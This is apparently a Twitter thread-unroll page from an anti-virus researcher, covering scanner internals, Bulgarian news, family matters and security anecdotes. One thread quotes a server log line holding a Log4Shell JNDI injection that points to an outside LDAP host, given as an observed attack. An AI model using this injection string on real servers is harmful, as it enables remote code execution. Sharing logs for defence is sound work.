Vess Profile picture
Anti-virus, malware and infosec expert, crypto amateur, privacy advocate and general annoyance. PGP keyID: 0x365697c632dd98d9
May 16, 2023 30 tweets 4 min read
So, Microsoft's scanner started detecting malware in password-protected ZIP archvies and people are losing their shit because they have no goddamn clue how anti-virus programs work.

arstechnica.com/information-te…

Strap in, kids, because I'm in a lecturing mood. Thread: For some unfathomable reason, people seem to think that scanning works like this:

f=OpenFile(fname)
buffer=ReadFile(f)
for str, name in scan_strings do
if str in buffer then
report_malware(name)
break
Feb 19, 2023 10 tweets 2 min read
Apparently, the Bulgarian "crypto queen", Ruja Ilieva, famous for the OneCoin scam, who has disappeared and is on the FBI most wanted list, was killed in November 2018 by order of a Bulgarian narco boss. The killer, also a Bulgarian, is presently in a Dutch prison for some drug-dealing crime.

She was killed on a yacht in the Ionian Sea, her body was cut into pieces and thrown overboard.
Oct 6, 2022 13 tweets 2 min read
Update. My mother's knee is swollen but not enough for them to have to drain it. So, she spends her time in bed with a large bag of ice on her knee.

She's the oldest patient in the room. Also the sanest one. The other two grannies, despite being younger than her, are senile. One of them talks to herself the whole night. The other, who has been operated, was trying to rip off her bandages, so they had to tie her to the bed.
Oct 5, 2022 34 tweets 5 min read
My mother fell and busted her knee... :-(

God, I live in such a shithole of a country.

A thread... She fell because the plates of the sidewalk were dislodged and she stepped between them.

In a civilized country that's a license to sue the city for damages because they didn't maintain the sidewalk.

In my country it's a license to be laughed at.
Sep 1, 2022 6 tweets 1 min read
It's hard to argue with people who are idiots.

It's even harder to argue with computers that are idiots.

But it is the hardest to argue with people who are idiots and are armed with computers that are idiots. Case in point. A former colleague of mine submitted a paper for a conference. The conference organizers used one of those idiotic plagiarism-checking tools. It came with the results that 31% of my colleague's paper was plagiarized.

The plagiarized parts were marked. Let's see:
Aug 29, 2022 11 tweets 2 min read
My bank just served me a cookie consent pop up. Being of the curious sort, I decided to delve into the options and see what exactly I am agreeing to.

There were several categories of cookies: strictly necessary, statistical, marketing. By default, only the cookies in the "strictly necessary" category are marked as the ones the user is agreeing to (although there is a big fat "accept all" button that most people would click). So far, so good.

OK, let's see what's "strictly necessary" to my bank, shall we?
May 19, 2022 12 tweets 2 min read
(Apologies for locking this thread but I'm really not in the mood of answering anyone's comments on this subject.)

In 1990, I established the Laboratory of Computer Virology at the Bulgarian Academy of Sciences. Computer viruses were very prevalent in my country at the time, I was single-handedly developing anti-virus programs for them and cleaning people's computers, so I thought it a good idea for an institution that would do this more professionally.
Mar 25, 2022 16 tweets 3 min read
OMG, Win10 is such a tremendous pile of crap!

It's as if someone who didn't have a clue how to design an ergonomic tablet user interface, has designed a crappy tablet user interface and put it on a goddamn desktop operating system. Did Microsoft fire all their user interface designers before starting to work on Windows 10?
Dec 11, 2021 4 tweets 1 min read
Scanning my web server logs for Log4g exploatation attempts...

Yesterday, a Russian IP was doing plain vanilla exploitation:

45.155.205.233 - - [10/Dec/2021:16:11:14 +0200] "GET / HTTP/1.1" 403 135 "-" "${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/STUFF" A few hours later the same IP did the same kind of exploitation with a minor variation - it put the IP of the attacked machine in the Referer header. (Exploitation still via User-Agent).
Aug 2, 2021 10 tweets 2 min read
@matthew_d_green, I just discovered that Twitter-style trolling exists in academia. Well, in Bulgarian academia, at least, but I somehow doubt that it's limited to it. @matthew_d_green Perhaps you're familiar with the "science" of "scientific metrics" - an attempt to measure the usefulness of the work done by scientists.

The original idea was to count how many papers the members of a scientific outfit publish in a year. Of course, that system was gamed.
Dec 29, 2020 13 tweets 2 min read
I kinda disagree with this.

Not disagree as in "He's wrong, this is complete bollocks" but as in "He's right about some things, wrong bout others, missing yet others and the things are much more nuanced and discretion must be applied". I was asked to elaborate, so here it is.

The whole article is based on the premise "ransomware contains data that's private for you, once you upload it, everyone can get it from VirusTotal". This is wrong and incomplete in several ways.
Dec 15, 2020 4 tweets 1 min read
The official total number of COVID-19 cases in Bulgaria is now 181,544 (+2,095), 5,838 dead (+150), 85,578 recovered (+1,858).

Of the 90,128 (+87) still infected, 7,045 are hospitalized (-199), 580 of them are in ICUs (-10).

7,919 of all infected are medical personnel (+66). Sofia is again hit the hardest - 312 of the new cases are here.

Positivity rate of the tests for the past 24 hours is 39.5%.

Only 33% of the medical personnel have requested to be vaccinated.
Dec 14, 2020 5 tweets 1 min read
The official total number of COVID-19 cases in Bulgaria is now 179,449 (+497), 5,688 dead (+62), 83,720 recovered (+1,963).

Of the 90,041 (-1,528) still infected, 7,244 are hospitalized (+20), 590 of them are in ICUs (-5).

7,853 of all infected are medical personnel (+38). Sofia is again hit the hardest - 131 of the new cases are here.

Positivity rate of the tests for the past 24 hours is 30.4%.

Averagely 1 of every 78 people in the country is currently infected.
Aug 6, 2020 7 tweets 2 min read
My mom: I got the monthly bill from the mobile provider. But I can't open it.

Me: Why not?

Mom: It's in a ZIP file protected with a password.

Me *confidently*: Oh, this is a common trick. Scammers send malware like this to bypass e-mail gateway scanners.

Mom: Take a look. So, I do. E-mail headers look perfectly OK. It really does seem to come from the mobile provider. Is this some trick I don't know?

The message addresses me correctly by name. OK, maybe they got it from somewhere.

Message says ZIP's encrypted with a password to protect data.
Jul 19, 2020 12 tweets 2 min read
So, if I can buy cucumbers on-line, why can't I vote on-line?

It's a good question that deserves a good answer.

Thread... To begin with, you are free to order as many cucumbers and as often as you want. As opposed to that, you're allowed to vote only once, otherwise it's voting fraud. So, unlike a cucumber-ordering system, an on-line voting system must ensure the uniqueness of your vote.
Jan 20, 2020 27 tweets 5 min read
Perhaps to honor Acad. Sendov's memory, I should tell you the story about how our Lab was created.

So, gather 'round the fire, kids, etc., etc.

It's story time... I started working with computer viruses in early 1988. I analyzed every new virus that appeared in our country and wrote a program against it. Yes, a separate program for each different virus.
Jan 12, 2020 72 tweets 11 min read
OK, folks, I promised to update you on the situation of the guys who get hit with something (MyKings, Sodinokibi, etc.) every
couple of months.

So, gather 'round the fire, kids, it's story time.

The story has a happy ending this time but is not without some funny moments... We had an agreement with their boss to drive with his car to my home address at 10:30 on Saturday and to drive me to their premises, because it's quite far away (one-hour commute for me) and I don't have a car.
Jan 10, 2020 13 tweets 2 min read
There is some weird shit going on with our Windows licensing. This isn't going to be a rant against Microsoft (besides the occasional jab); mostly against the idiocy of Bulgarian government bureaucracies...

Thread... The outfit I work for (the National Laboratory of Computer Virology) is part of the Bulgarian Academy of Sciences. The latter is a government research institution, on government budget. The entity that decides how the budget is spent in the Ministry of Education.
Nov 13, 2019 50 tweets 7 min read
Attending the third and last day of the ethics conference.

Before we begin I stop by one of the organizers' table and half-jokingly note that I hope there will be no racist remarks today. "What racist remarks", asks the organizer. Oh, c'mon, you were sitting on the same row as me yesterday during THAT lecture.

OK, let's be precise. "Yesterday morning, during the first lecture", specify I.
Sep 16, 2019 15 tweets 2 min read
I've been researching the SimJack issue and the more I am, the more something smells fishy about it... Yes, there has been a wide coverage of it. But every single article stems from a single source - the AdaptiveMobile report. OK, so they were the ones to discover it, so maybe that's fair. But no independent confirmations? That's odd...
Aug 1, 2019 22 tweets 6 min read
Oh, my...

The AG office has released proofs of culpability of TAD Group and Kristian Boykov in the hack of the Bulgarian National Revenue Agency.

Things don't look good for the defendant... The stuff I saw in the media is mostly images, so Google Translate won't work; it will take me some time to compose the gist of it for Twitter. Hang on.

BTW, I couldn't find the corresponding info on the site of the AG office.